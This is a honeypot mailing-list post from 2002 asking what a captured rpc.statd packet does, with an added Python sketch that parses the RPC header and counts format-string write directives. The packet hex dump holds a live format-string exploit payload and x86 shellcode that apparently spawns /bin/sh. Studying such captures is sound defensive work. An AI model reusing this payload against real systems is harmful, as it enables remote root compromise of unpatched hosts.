Honeypots
mailing list archives
statd exploit ???
From: "Sriram Newsgroups" <srinews () hotmail com>
Date: Wed, 30 Oct 2002 16:29:35 -0600
My honeypot recorded this packet. It looks to be a statd exploit (port
32768). I can't narrow it down to what exactly this exploit does or its nature.
Here is the sample packet
10/25-17:41:34.464523 24.123.46.10:847 -> x.x.x.linux:32768
UDP TTL:47 TOS:0x0 ID:51930 IpLen:20 DgmLen:1104
Len: 1084
51 1B 5D 1C 00 00 00 00 00 00 00 02 00 01 86 B8 Q.].............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3D B9 D6 3B 00 00 00 09 6C 6F 63 61 6C 68 6F 73 =..;....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25 ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68 x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90 n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
-------------------------- Repeated 41 lines ---------------------
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N.............
FF FF FF 00 ....
My honeypot replied with this
10/25-17:41:34.468306 x.x.x.linux:32768 -> 24.123.46.10:847
UDP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
Len: 40
51 1B 5D 1C 00 00 00 01 00 00 00 00 00 00 00 00 Q.].............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2F .............../
Any ideas ????
Sriram
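
Added example, not part of the original post: a Python sketch that decodes the ONC RPC call header (RFC 5531) from the first 144 bytes of the request shown above and counts printf-style write directives in the procedure argument. The function names, the regular expression and the returned field names are choices made for this example.

```python
import re
import struct

# First 144 bytes of the request as printed in the post; the rest is elided there.
CAPTURE = bytes.fromhex(
    "511b5d1c0000000000000002000186b8" "00000001000000010000000100000020"
    "3db9d63b000000096c6f63616c686f73" "74000000000000000000000000000000"
    "0000000000000000000003e718f7ffbf" "18f7ffbf1af7ffbf1af7ffbf25387825"
    "38782538782538782538782538782538" "78253878253878253632373136782568"
    "6e2535313835397825686e9090909090"
)
# printf-style directives that write to memory (%n, %hn, %hhn, %4$hn, ...)
WRITE_DIRECTIVE = re.compile(rb"%(?:\d+\$)?\d*h{0,2}n")

def xdr_opaque(buf, off):
    """Read an XDR variable-length field: (declared length, bytes present, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    start = off + 4
    return n, buf[start:start + n], start + n + (-n % 4)  # XDR pads to 4 bytes

def parse_rpc_call(buf):
    """Decode an ONC RPC v2 CALL header and inspect its first argument."""
    xid, mtype, rpcvers, prog, vers, proc, cred_flavor = struct.unpack_from(">7I", buf, 0)
    if mtype != 0 or rpcvers != 2:
        raise ValueError("not an ONC RPC version 2 CALL")
    _, cred, off = xdr_opaque(buf, 28)
    # AUTH_UNIX (flavor 1) credentials: 4-byte stamp, then the machine name string
    machine = xdr_opaque(cred, 4)[1] if cred_flavor == 1 else b""
    _, _, off = xdr_opaque(buf, off + 4)      # skip verifier flavor, read its body
    arg_len, arg, _ = xdr_opaque(buf, off)    # the argument here is a single string
    return {
        "xid": xid, "program": prog, "version": vers, "procedure": proc,
        "machine": machine.decode("ascii", "replace"),
        "arg_declared": arg_len, "arg_captured": len(arg),  # differ when truncated
        "write_directives": len(WRITE_DIRECTIVE.findall(arg)),
        "nonprintable": sum(b < 0x20 or b > 0x7E for b in arg),
    }

if __name__ == "__main__":
    for key, value in parse_rpc_call(CAPTURE).items():
        print(f"{key:17} {value}")
```

Program 100024 is the registered RPC number for the status monitor (statd) and procedure 1 is SM_STAT, whose argument is a host name string. In this capture that string declares 999 bytes and, in the 68 bytes shown, contains two %hn directives and 21 non-printable bytes.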